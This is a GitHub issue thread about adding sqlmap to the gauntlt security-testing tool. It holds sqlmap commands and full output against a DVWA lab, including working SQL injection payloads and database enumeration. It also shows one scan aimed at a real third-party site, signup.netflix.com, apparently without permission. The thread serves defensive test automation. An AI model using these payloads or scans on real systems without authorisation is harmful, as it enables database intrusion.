Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

Add sqlmap to gauntlt #4

Closed
wickett opened this Issue Jun 21, 2012 · 4 comments

Comments

Projects
None yet
4 participants
Owner

wickett commented Jun 21, 2012

Implement sqlmap for gauntlt so that it can be called via gauntlt steps.

@ghost ghost assigned wickett and matt-tesauro Jun 21, 2012

@royrapoport royrapoport was assigned Aug 11, 2012

Contributor

bowsersenior commented Aug 11, 2012

Hi Roy,

As we talked about yesterday, I am assigning you some issues. It would be great if you could come up with some sqlmap examples. You don't need to make them work with gauntlt. Just some shell commands that you find useful. Not sure how familiar you are with sqlmap or how willing you are to learn more about it. Let me know if you'd like me to re-assign.

Thanks,
Mani

Member

royrapoport commented Sep 9, 2012

OK, so here's where we are. Apologies for the potentially-bad typing -- I cut the HECK out of my thumb and there's a big bandage wrapped around it.

Generally speaking, sqlmap isn't really meant as a "just point it at your website and have it do its magic" sort of tool. It requires some care in defining the options required for running, and has tons of additional options.

I used DVWA (Damn Vulnerable Web Application) to generate this; this ended up being similar to most of the examples you'll find out there if you do searches on "sqlmap dvwa."

Let's start with a basic scan:
./sqlmap.py --url "http://10.211.55.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=esuneq9r11kd98efafmqqtoli7" --string="Surname" --batch

The URL is required (there are other ways to feed sqlmap a target, but I'm using this one). The cookie is not required in general (but is required in this case); the --string is optional; --batch just means it won't ask questions. We should use --batch.

Notice that this essentially performs a GET on a form submission; you can also post, using a different command-line option.

Here's the output from the vulnerable application:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:45:01

[23:45:01] [WARNING] skipping purging of directory '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output' as it does not exist
[23:45:01] [INFO] testing connection to the target url
[23:45:01] [INFO] testing if the provided string is within the target URL page content
[23:45:01] [INFO] testing if GET parameter 'id' is dynamic
[23:45:01] [INFO] confirming that GET parameter 'id' is dynamic
[23:45:01] [INFO] GET parameter 'id' is dynamic
[23:45:01] [INFO] heuristics detected web page charset 'ascii'
[23:45:01] [WARNING] reflective value(s) found and filtering out
[23:45:01] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[23:45:01] [INFO] testing for SQL injection on GET parameter 'id'
[23:45:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:45:01] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[23:45:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:45:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[23:45:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:45:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:45:12] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[23:45:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:45:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[23:45:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:45:12] [INFO] target url appears to have 2 columns in query
[23:45:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[23:45:12] [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9686=9686 AND 'khJJ'='khJJ&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 9639 FROM(SELECT COUNT(*),CONCAT(0x3a6a63783a,(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END)),0x3a6e6c613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dyRj'='dyRj&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6a63783a,0x62477750545953714c63,0x3a6e6c613a),NULL#&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'PoxG'='PoxG&Submit=Submit

[23:45:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[23:45:12] [INFO] fetched data logged to text files under '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output/10.211.55.4'

[*] shutting down at 23:45:12

Notice the line containing "sqlmap identified the following injection points" and "[23:45:12] [INFO] GET parameter 'id' is vulnerable." Both of these indicate we found a vulnerability.

If we wanted to run the same command but add '--dbs', we'd get:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:46:22

[23:46:22] [INFO] resuming back-end DBMS 'mysql'
[23:46:22] [INFO] testing connection to the target url
[23:46:22] [INFO] testing if the provided string is within the target URL page content

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9686=9686 AND 'khJJ'='khJJ&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 9639 FROM(SELECT COUNT(*),CONCAT(0x3a6a63783a,(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END)),0x3a6e6c613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dyRj'='dyRj&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6a63783a,0x62477750545953714c63,0x3a6e6c613a),NULL#&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'PoxG'='PoxG&Submit=Submit

[23:46:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[23:46:22] [INFO] fetching database names
[23:46:22] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[] dvwa
[
] information_schema
[] mysql
[
] performance_schema
[*] test

[23:46:22] [INFO] fetched data logged to text files under '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output/10.211.55.4'

[*] shutting down at 23:46:22

Notice the line starting with "available databases [5]:" after which it actually shows you what DBs are on the box. Scary.

Compare this to running against a non-vulnerable target:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:47:30

[23:47:31] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'https://signup.netflix.com/'. Do you want to follow? [Y/n]
[23:47:33] [ERROR] user aborted

[*] shutting down at 23:47:33

2611 lglt-tudang sqlmapproject-sqlmap-f26ea04> ./sqlmap.py --url "http://signup.netflix.com?username=rrapoport&password=foo" --batch

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:47:36

[23:47:36] [INFO] testing connection to the target url
[23:47:36] [INFO] sqlmap got a 302 redirect to 'https://signup.netflix.com/'. Do you want to follow? [Y/n] Y
[23:47:38] [INFO] heuristics detected web page charset 'None'
[23:47:39] [INFO] testing if the url is stable, wait a few seconds
[23:47:40] [INFO] heuristics detected web page charset 'ascii'
[23:47:40] [WARNING] GET parameter 'username' appears to be not dynamic
[23:47:41] [WARNING] heuristic test shows that GET parameter 'username' might not be injectable
[23:47:41] [INFO] testing for SQL injection on GET parameter 'username'
[23:47:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:47:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:47:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:47:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:47:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:47:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:47:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:47:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:47:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:47:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:47:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:48:00] [INFO] testing 'Oracle AND time-based blind'
[23:48:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:48:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:48:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option

[23:48:38] [WARNING] GET parameter 'username' is not injectable
[23:48:38] [WARNING] GET parameter 'password' appears to be not dynamic
[23:48:39] [WARNING] heuristic test shows that GET parameter 'password' might not be injectable
[23:48:39] [INFO] testing for SQL injection on GET parameter 'password'
[23:48:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:48:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:48:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:48:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:48:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:48:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:48:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:48:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:48:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:48:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:48:57] [INFO] testing 'Oracle AND time-based blind'
[23:48:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:49:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:49:40] [WARNING] GET parameter 'password' is not injectable
[23:49:40] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[23:49:40] [WARNING] HTTP error codes detected during testing:
405 (Method Not Allowed) - 320 times

[*] shutting down at 23:49:40

Note the last [CRITICAL] line.

What other information would you like me to provide?

Contributor

bowsersenior commented Sep 11, 2012

Thanks for your help @royrapoport ! This is very good info. I'll use this to add a sqlmap cuke to gauntlt to get people started. We need to get some input from some veteran sqlmap users on this at some point in order to make it better.

@bowsersenior bowsersenior was assigned Sep 11, 2012

Contributor

bowsersenior commented Sep 16, 2012

To finish this particular issue, I will use scapegoat to create a simple web page with a form input that is vulnerable to SQL injection. Then the tests for gauntlt can run SQLMAP against the page by starting scapegoat during the test run. This will be the first attack adapter that is tested with scapegoat.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment